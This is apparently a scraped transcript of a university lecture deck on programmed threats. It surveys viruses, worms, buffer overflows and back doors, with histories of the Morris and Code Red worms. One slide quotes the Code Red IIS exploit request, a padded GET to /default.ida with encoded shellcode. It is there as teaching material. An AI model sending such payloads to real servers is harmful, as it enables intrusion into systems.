1 / 14

Programmed Threats Richard Newman

Programmed Threats Richard Newman. What is a Programmed Threat?. Potential source of harm from computer code May be in form of - Executable program - Executable code attached to another program - Executable code pushed onto stack of running process - Standalone script

jlindley
Download Presentation

Programmed Threats Richard Newman

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Programmed ThreatsRichard Newman

  2. What is a Programmed Threat? Potential source of harm from computer code May be in form of - Executable program - Executable code attached to another program - Executable code pushed onto stack of running process - Standalone script - Commands run on startup of program - Commands embedded in “non-executable” file • JPEG • Postscript - Macros

  3. Examples of Programmed Threats 1. Trojan Horse • Program that purports to do one thing but (also) does another 2. Virus • Embedded in another program/file (becomes Trojan) • Must get user or system to run program/open file • Infects other files/drives • Hitchhikes to other file systems on host file via removable media or email 3. Bacteria/Rabbits • Replicate so fast, use up all resources 4. Worm • Stand-alone program • Transfers itself to target system • Runs automatically on target system (generally)

  4. More Programmed Threats 5. Buffer overflow attack • “Improper” parameters corrupts stack • Includes executable code • Return pointer in activation frame may be changed to point to code 6. SQL Injection • Interpretable commands included in SQL query • SQL engine executes malicious commands 7. Run command script • Malicious commands included in .rc (or similar) file • Commands executed when program is started5. Run command script 8. Back Door/Trap Door • “Secret” way to get access to system • May be included for field technicians or administrators • See http://cm.bell-labs.com/who/ken/trust.html • Often first goal of intruders

  5. Viruses 1. History • Von Neumann's self-reproducing automata in 1960's • Seehttp://en.wikipedia.org/wiki/Notable_computer_viruses_and_worms • First seriously appeared in early 1980's – Elk Cloner, Brain • Big issue with PCs and floppy disks/bulletin boards 2. General MO • Infected program run – viral code runs first • Optionally takes measures to hide • Looks for new files/drives to infect, infects them • Does “other stuff” • Logic Bomb • Time Bomb • Password cracking • Install back door • Wreak havoc • Returns control to original program

  6. Viruses 3. Boot Sector Virus • Copies boot sector (small bootstrap program) to unused disk block • Overwrites boot sector with viral code • Intercepts calls to disk drive/TSR code • Redirects reads of boot sector to read copy in other location • Looks for new disk to infect whenever disk is accessed 4. Executable Virus • Adds viral code to executable program • May rewrite JUMP instruction to jump to viral code first, then issue JUMP to program code when done • May modify itself (code transformation) or modify where it is stored to evade detection (polymorphic virus)

  7. Viruses 5. Macro Virus • Included in “non-executable” file with format supporting macros • Spreadsheets • Document preparation software • Graphics editors • Copies macros into other files of same type • Modifies file contents to exercise macros 4. Stealth Techniques • Intercept system calls to modify (man-in-the-middle) • Modify system meta-information (File control block, process info) • Compress itself so file size does not change • Modify itself • Encrypt viral code

  8. Worms 1. History • 1971 “Creeper virus” at BBN - “Reaper” to kill it • Name coined in Brunner's “The Shockwave Rider” scifi • Xerox PARC worm for using idle workstations (1982) • Enabled by network/LAN technology • Morris worm 1987 • Code Red, etc. 2. General MO • Standalone program • Looks for target host • Transfers loader (micro-FTP) to target host See http://www.wormblog.com/

  9. PARC Worm 3. Xerox PARC worm - 1982 • Users ran server pgm on W/S when idle • Worm “head” found idle workstations, sent work • “Segments” did work, reported to head • Head had backup segments also • Had to shut down all stations to get to stop! • See Shoch and Hupp, “The Worm Programs: Early Experience with a Distributed Computation,” Xerox Palo Alto Research Center, 1982. http://www.cs.berkeley.edu/~prabal/resources/osprelim/SH82.pdf

  10. Morris Worm 4. Morris worm • Experiment by grad student at Cornell November 1988 • Looks for target host – random, /etc/hosts, .rhosts • Tried to get access • Sendmail “feature” - debug mode • Symmetry of trust • Finger flaw – buffer overflow • Password guessing • Transferred “grappling hook” to target host • Grappling hook got rest of worm, ran it • Overwhelmed hosts with processes • Overwhelmed networks

  11. Morris Worm 4. Morris worm (con't) • Stealth techniques • “encrypted” code (flipped MSB in ASCII) • Changed process name to innocuous pgm • Changed process ID periodically – short life per proc • Died completely after short time • Sendmail access • Back door, poor configuration, poor interface • Symmetry of trust • Remote login without password required • Host lists trusted hosts • If a host B is on list of A, likely host A is on list of B spaf.cerias.purdue.edu/tech-reps/823.pdf

  12. Code Red Worm 5. Code Red Worm • July 2001 • Attacked MS IIS • Buffer overflow attack • Patch had been available for a month • Spread • Only 1st – 19th of month – look for other IIS servers • Did not determine if IIS server was vulnerable first • Mischief • Deface website - “Hacked by Chinese” • Launch DoS attack 20th -27th of month vs. fixed IP addr

  13. Code Red Worm 5. Code Red Worm IIS buffer overflow: GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNN %u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801 %u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3 %u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0

  14. Code Red Worm 5. Code Red Worm • July 2001 • Attacked MS IIS • Buffer overflow attack • Patch had been available for a month • Spread • Only 1st – 19th of month – look for other IIS servers • Did not determine if IIS server was vulnerable first • Mischief • Deface website - “Hacked by Chinese” • Launch DoS attack 20th -27th of month vs. fixed IP addr

More Related